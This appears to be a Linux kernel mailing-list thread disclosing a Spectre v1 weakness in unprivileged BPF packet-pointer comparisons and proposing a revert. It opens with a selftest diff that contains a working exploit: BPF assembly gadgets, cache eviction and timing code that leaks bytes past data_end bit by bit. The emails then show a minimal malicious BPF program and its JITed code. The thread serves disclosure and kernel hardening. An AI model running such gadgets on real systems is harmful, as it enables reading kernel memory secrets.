+static void die(char *s) +{ + perror(s); + exit(1); +} + +#define SERVER "127.0.0.1" +#define BUFLEN (128 * 1024) +#define PORT 8888 + +static int client(struct sockaddr_in *si_other) { + static int s = -1; + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) si_other, 0, sizeof(si_other)); + si_other->sin_family = AF_INET; + si_other->sin_port = htons(PORT); + + if (inet_aton(SERVER , &si_other->sin_addr) == 0) { + fprintf(stderr, "inet_aton() failed\n"); + exit(1); + } + + return s; +} + +static int server(void) { + struct sockaddr_in si_me; + int s; + + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) &si_me, 0, sizeof(si_me)); + + si_me.sin_family = AF_INET; + si_me.sin_port = htons(PORT); + si_me.sin_addr.s_addr = htonl(INADDR_ANY); + + if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) { + die("bind"); + } + + return s; +} + +static int client_ping(int s, struct sockaddr_in *si_other, size_t n) { + unsigned int slen = sizeof(*si_other); + static char message[BUFLEN] = {}; + memset(message, 0x37, n); + + if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) { + die("sendto()"); + } + + return 0; +} + +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define EI_MASK(BYTE, MASK) \ + else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK)); + +#define EI_BYTE(BYTE) \ + EI_MASK(BYTE, 1) \ + EI_MASK(BYTE, 2) \ + EI_MASK(BYTE, 4) \ + EI_MASK(BYTE, 8) \ + EI_MASK(BYTE, 16) \ + EI_MASK(BYTE, 32) \ + EI_MASK(BYTE, 64) \ + EI_MASK(BYTE, 128) + +static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total, + long long *t0, long long *t1, int offset, int mask) { + DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS); + + int fd; + if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1); + EI_BYTE(366) + EI_BYTE(367) + EI_BYTE(368) + EI_BYTE(369) + EI_BYTE(370) + EI_BYTE(371) + EI_BYTE(372) + EI_BYTE(373) + else { + errno = EINVAL; + die("mask/offset"); + } + + DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd); + int ret; + + ret = bpf_tc_hook_create(&hook); + ret = ret == -EEXIST ? 0 : ret; + if (ret) { + errno = -ret; + perror("hook create"); + if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)")) + goto destroy; + } + + ret = bpf_tc_attach(&hook, &opts); + if (ret) + if (!ASSERT_OK(ret, "bpf_tc_attach")) + goto end; + + int ss = server(); + struct sockaddr_in si_server; + int cs = client(&si_server); + + client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0 + +#define LEAKMAP_ENTRIES (5 * 512) + + for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) { + __u32 key = i; + __s64 value = -i; + ret = bpf_map__update_elem(skel->maps.leakmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_leak")) + goto end; + } + } + +// for 128KiB L1d, 90MiB L3, 1536-entry sltlb +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) { + __u32 index = i / 8; + __u32 key = i + (index % 8); + __u64 value = i; + ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_evict")) + goto end; + } + } + + long long n = 0; +#define T 8 +#define N 8 + long long i; + for (i = 0; n < N; i++) { + // Branch prediction using PHT will be wrong unless it knows rand(). + int t = rand() % T; + for (int j = 0; j < t; j++) { + client_ping(cs, &si_server, 512); + } + client_ping(cs, &si_server, 128); // + 42 byte header + +#define X 4 + __s64 delta[X]; + for (size_t j = 0; j < X; j++) { + __u32 key[X] = {0, 512, 1536, 1024}; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]), + &delta[j], sizeof(delta[j]), 0); + if (ret) { + if (!ASSERT_OK(ret, "delta lookup")) + goto end; + } + if (delta[j] <= 0) { + ASSERT_OK(-1, "delta not written by bpf program"); + } + } + + __u32 key = 2048; + __u64 err; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0); + if (ret) { + if (!ASSERT_OK(ret, "err lookup")) + goto end; + } + static bool first = true; + if (err && first) { + first = false; + ASSERT_OK(-err, "bpf"); + } + + if (i == 2 * 2 * N) { + // reload and retry + ret = -1; + // fprintf(stderr, "i: timeout after %lld reps\n", i); + break; + } + + // sometimes everything is still in the cache + if (!((delta[3] < delta[2]))) { + // fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]); + continue; + } + + if (delta[0] > delta[1]) + *t0 += 1000; + else + *t1 += 1000; + n++; + } + + *skipped += i-n; + *total += i; + + if (n > 0) { + *t0 /= n; + *t1 /= n; + } + + __u32 key = 0; + __u64 value; + int ret2 = bpf_map__lookup_elem(skel->maps.evictmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret2) { + if (!ASSERT_OK(ret2, "lookup")) + goto end; + } + if (value > i*T) { + ASSERT_OK(-1, "BUG value > i*T"); + goto end; + } + +end: + close(ss); + close(cs); + + opts.prog_fd = opts.prog_id = 0; + ret2 = bpf_tc_detach(&hook, &opts); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_detach"); + +destroy: + ret2 = bpf_tc_hook_destroy(&hook); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_hook_destroy"); + + return ret; +} + void tc_bpf_non_root(void) { struct test_tc_bpf *skel = NULL; @@ -409,11 +656,90 @@ void tc_bpf_non_root(void) if (!ASSERT_OK(ret, "disable_cap_sys_admin")) goto restore_cap;
- skel = test_tc_bpf__open_and_load(); - if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load")) - goto restore_cap; + libbpf_set_print(NULL); + +#define O 1 + for (int k = 0; k < O; k++) {// to test reproducibility + + // Must match generated pkt_ptr programs in test_tc_bpf.c and exploit() + // function. + __u64 base_byte = 366; + + long long skipped = 0; + long long total = 0; + long long bad_loads = 0; + long long total_loads = 0; + __u64 qw = 0; + + for (__u64 byte = 0; byte < 8; byte++) { + for (__u64 bit = 0; bit < 8; bit++) { + + long long dmax = INT_MIN; + long long dmin = INT_MAX; + long long d = 0; + long long m = 0; +#define M 8 + int j = 0; + for (j = 0; true; j++) { + total_loads += 1; + skel = test_tc_bpf__open_and_load(); + if (skel) { + long long t0 = 0, t1 = 0; + + ret = exploit(skel, + &skipped, &total, + &t0, &t1, + base_byte + byte, 1 << bit); + if (ret == -1) { + bad_loads += 1; + goto cleanup; + } + if (ret) + if (!ASSERT_OK(ret, "exploit")) + goto restore_cap; + + if (j == 0) { + goto cleanup; + } + + long long jd = t0 - t1; + dmax = jd > dmax ? jd : dmax; + dmin = jd < dmin ? jd : dmin; + d += jd; + m++; + } + cleanup: + test_tc_bpf__destroy(skel); + + if (j == 64 * M) { + fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway"); + break; + } + + // Continue as long as result is inconclusive. + if (m >= M && (d / m >= 200 || d / m <= -200)) { + break; + } + } + + d /= m; + + fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j); + + // little endian + __u64 b = !!(d < 0 ? 0 : 1); + qw |= b << ((byte * 8) + bit); + } + } + fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n" + "\t>%lld percent bad samples; %lld percent bad loads\n", + base_byte, base_byte - 42 - 128, qw, + (skipped * 100) / total, + (bad_loads * 100) / total_loads);
- test_tc_bpf__destroy(skel); + } + + ASSERT_OK(-1, "exploit");
restore_cap: if (caps) diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c old mode 100644 new mode 100755 index ef7da419632a..c5344255ce88 --- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c @@ -4,6 +4,7 @@ #include <bpf/bpf_helpers.h> #include <linux/if_ether.h> #include <linux/ip.h> +#include "bpf_misc.h"
/* Dummy prog to test TC-BPF API */
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb) return 0; }
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */ -SEC("tcx/ingress") -int pkt_ptr(struct __sk_buff *skb) -{ - struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr); +/* pkt-ptr-based Spectre v1 gadget */
- if ((long)(iph + 1) > (long)skb->data_end) - return 1; - return 0; +#define LEAKMAP_ENTRIES (5 * 512) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, LEAKMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} leakmap SEC(".maps"); + +#define L1_SIZE_KiB 128 +#define SIZEOF_CACHELINE 64 +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, EVICTMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} evictmap SEC(".maps"); + +static long callback_fn(__u32 index, void *ctx) { +// sizeof(u64) * 8 is one 64-byte cacheline + __u32 key = index * 8 + (index % 8); + __u64 *value = bpf_map_lookup_elem(&evictmap, &key); + if (value) { + *value += 1; + return 0; + } + return 1; } + +#define STRINGIFY(x) #x +#define TOSTRING(x) STRINGIFY(x) +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define OFFSET 350 +#define MASK 1 +#include "test_tc_bpf_pkt_ptr.h" +#undef OFFSET +#undef MASK + +// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128 +#define OFFSET 366 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 367 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 368 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 369 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 370 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 371 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 372 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 373 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET + +char LICENSE[] SEC("license") = "GPL"; diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h new file mode 100644 index 000000000000..2cd6ab000e4d --- /dev/null +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h @@ -0,0 +1,172 @@ +#include <linux/bpf.h> +#include <bpf/bpf_helpers.h> +#include <linux/if_ether.h> +#include <linux/ip.h> +#include "bpf_misc.h" + +/* +cd /root/bpf && ./ltb/sbin/bpftool prog loadall ./test_tc_bpf.bpf.o /sys/fs/bpf/tc && ./ltb/sbin/bpftool prog dump jited pinned /sys/fs/bpf/tc/pkt_ptr + +*/ + +#undef SHIFT +#if MASK == 1 +#define SHIFT 9 +#endif +#if MASK == 2 +#define SHIFT 8 +#endif +#if MASK == 4 +#define SHIFT 7 +#endif +#if MASK == 8 +#define SHIFT 6 +#endif +#if MASK == 16 +#define SHIFT 5 +#endif +#if MASK == 32 +#define SHIFT 4 +#endif +#if MASK == 64 +#define SHIFT 3 +#endif +#if MASK == 128 +#define SHIFT 2 +#endif + +SEC("tcx/ingress") +__naked +void NAME(OFFSET, MASK)(void) +{ + // +76: data + // +80: data_end + asm volatile ( + "r7 = r1;" + + // Prepare data in callee-saved register that is not used by bpf_loop + // and callback_fn (and therefore not saved/restored). + "r9 = *(u32 *)(r7 + 76);" + "r8 = r9;" + // Construct bad ptr + "r9 += " TOSTRING(OFFSET) ";" + + // Prepare warm up gadget + "r8 += 166;" // 128 payload + 42 header - 4 + "r0 = *(u32 *)(r7 + 80);" // data_end + "if r0 <= r8 goto err_%=;" + + // Iterate over 8MiB to evict data_end cacheline from 1536-entry STLB + // and core's 2.5MiB L3. + "r1 = 1024;" // *= 8 in callback + "r1 *= 128;" + "r2 = %[callback_fn] ll;" + "r3 = 0;" + "*(u64 *)(r10 - 8) = r3;" + "r3 = r10;" + "r3 += -8;" + "r4 = 0;" + "call %[bpf_loop];" + + // Warm secret TLB, improves accuracy + "r5 = *(u8 *)(r8 + 0);" + + "r8 = r9;" + // Wait for TLB to resolve page by storing to unitialized stack slot which will insert an lfence. + "*(u64 *)(r10 - 16) = r5;" + + // Check bpf_loop err + "if r0 == 0 goto err_%=;" + + // Prepare bpf_map_lookup_elem() args + "r1 = %[leakmap] ll;" + "r2 = r10;" + "r2 += -8;" + // Gadget + "r3 = *(u32 *)(r7 + 80);" // slow data_end load + "if r3 <= r8 goto check0_%=;" // mispredicted branch + // "r5 = 0x84;" // for testing gadget without load + "r5 = *(u8 *)(r9 + 0);" // fast secret load + "r5 &= " TOSTRING(MASK) ";" + "r5 <<= " TOSTRING(SHIFT) ";" + "*(u64*)(r10 - 8) = r5;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto err_%=;" + "r0 = *(u64 *)(r0 + 0);" // leak secret into leakmap[0|512].is_cached + + // Adds lfence, to make sure we don't speculate into the check code + "*(u64 *)(r10 - 24) = r0;" + + "check0_%=:" + +#undef TIME_R7 +#define TIME_R7() \ + "*(u64*)(r10 - 8) = r7;" \ + "call %[bpf_ktime_get_ns];" \ + "r6 = r0;" \ + "r1 = %[leakmap] ll;" \ + "r2 = r10;" \ + "r2 += -8;" \ + "call %[bpf_map_lookup_elem];" \ + "if r0 == 0 goto err_%=;" \ + "r1 = *(u64 *)(r0 + 0);" \ + "r7 = r0;" \ + "call %[bpf_ktime_get_ns];" \ + "r0 -= r6;" \ + "*(u64 *)(r7 + 0) = r0;" + + // warm instruction caches + "r7 = 1024;" + TIME_R7() + + // uncached access for comp. + "r7 = 1536;" + TIME_R7() + + // test 0 delay + "r7 = 0;" + TIME_R7() + + // test 1 delay + "r7 = 512;" + TIME_R7() + + // cached access for comp. + "r7 = 1024;" + TIME_R7() + + // set err=0 + "r1 = %[leakmap] ll;" + "r2 = 2048;" + "*(u64*)(r10 - 8) = r2;" + "r2 = r10;" + "r2 += -8;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto err_%=;" + "r1 = 0;" // err + "*(u64 *)(r0 + 0) = r1;" + + "goto exit_%=;" + + "err_%=:" + "r1 = %[leakmap] ll;" + "r2 = 2048;" + "*(u64*)(r10 - 8) = r2;" + "r2 = r10;" + "r2 += -8;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto exit_%=;" + "r1 = 2;" // err = other + "*(u64 *)(r0 + 0) = r1;" + + "exit_%=:" + "r0 = 2;" // TC_ACT_SHOT, drop packet + "exit;" + : + : __imm_addr(leakmap), + __imm_addr(callback_fn), + __imm(bpf_loop), + __imm(bpf_ktime_get_ns), + __imm(bpf_map_lookup_elem) + : __clobber_all); +} diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h new file mode 100644 index 000000000000..b73ee23a59ec --- /dev/null +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h @@ -0,0 +1,31 @@ +#define MASK 1 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 2 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 4 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 8 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 16 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 32 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 64 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 128 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data r3 = data_end r6 = ... // index to access, constant does not help r7 = data_end - data // only known at runtime, could be [0,PKT_MAX) if !(r6 < r7) goto exit // no masking of index in r6 happens r2 += r6 // addr. to access r5 = *(u8 *)(r2 + 0) // speculatively read secret // ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power of 2 for the packet data and then also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
On 15/09/2023 04:26, Yafang Shao wrote:
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64
13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data r3 = data_end r6 = ... // index to access, constant does not help r7 = data_end - data // only known at runtime, could be [0,PKT_MAX) if !(r6 < r7) goto exit // no masking of index in r6 happens r2 += r6 // addr. to access r5 = *(u8 *)(r2 + 0) // speculatively read secret // ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power of 2 for the packet data and then also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
I see your point, but this has been the case since Spectre v1 was mitigated for BPF. I actually did a few statistics on that in [1] and
50 out of ~350 programs are rejected because of the Spectre v1
mitigations. However, to repeat: The operation is not completely prohibited, only prohibited without CAP_PERFMON.
Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX flags in sysfs? It would be helpful for debugging, and you could set it to 1 permanently for your purposes. However, I'm not sure if the others would like that...
Another solution I have been working on in [2] is to change the mitigations to insert an lfence instead of rejecting the program entirely. That would have bad performance, but would still be better than completely rejecting the program. However, these patches are far from going upstream currently.
A detail: The patches in [2] currently do not support the case we are discussing here, they only insert fences when the speculative paths fail to verify.
[1] https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presenta... - Slide 9 [2] https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospe...
On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst gerhorst@cs.fau.de wrote:
On 15/09/2023 04:26, Yafang Shao wrote:
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64
13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data r3 = data_end r6 = ... // index to access, constant does not help r7 = data_end - data // only known at runtime, could be [0,PKT_MAX) if !(r6 < r7) goto exit // no masking of index in r6 happens r2 += r6 // addr. to access r5 = *(u8 *)(r2 + 0) // speculatively read secret // ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power of 2 for the packet data and then also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
I see your point, but this has been the case since Spectre v1 was mitigated for BPF. I actually did a few statistics on that in [1] and
50 out of ~350 programs are rejected because of the Spectre v1
mitigations. However, to repeat: The operation is not completely prohibited, only prohibited without CAP_PERFMON.
Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX flags in sysfs? It would be helpful for debugging, and you could set it to 1 permanently for your purposes. However, I'm not sure if the others would like that...
I really appreciate that idea. I actually shared a similar concept earlier.[1]. Nonetheless, I believe it would be prudent to align with the system settings regarding CPU security mitigations within the BPF subsystem as well. In our production environment, we consistently configure it with "mitigations=off"[2] to enhance performance, essentially deactivating all optional CPU mitigations. Consequently, if we implement a system-wide "mitigations=off" setting, it should also inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.
Alexei, Daniel, any comments ?
[1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F6... [2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html
Another solution I have been working on in [2] is to change the mitigations to insert an lfence instead of rejecting the program entirely. That would have bad performance, but would still be better than completely rejecting the program. However, these patches are far from going upstream currently.
A detail: The patches in [2] currently do not support the case we are discussing here, they only insert fences when the speculative paths fail to verify.
[1] https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presenta...
- Slide 9
[2] https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospe...
-- Luis
-- Regards Yafang
On 9/19/23 5:43 AM, Yafang Shao wrote:
On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst gerhorst@cs.fau.de wrote:
On 15/09/2023 04:26, Yafang Shao wrote:
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduct constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and every date below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if a static upper bound, below of which every access is valid, can be given.
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size and therefore 0 is the only statically known upper bound below of which every date is always accessible (i.e., none).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the same way in that comparing a pointer to a known scalar can be used for pointer leaks. That is because the "secret" components of the addresses cancel each other out if the pointers are into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
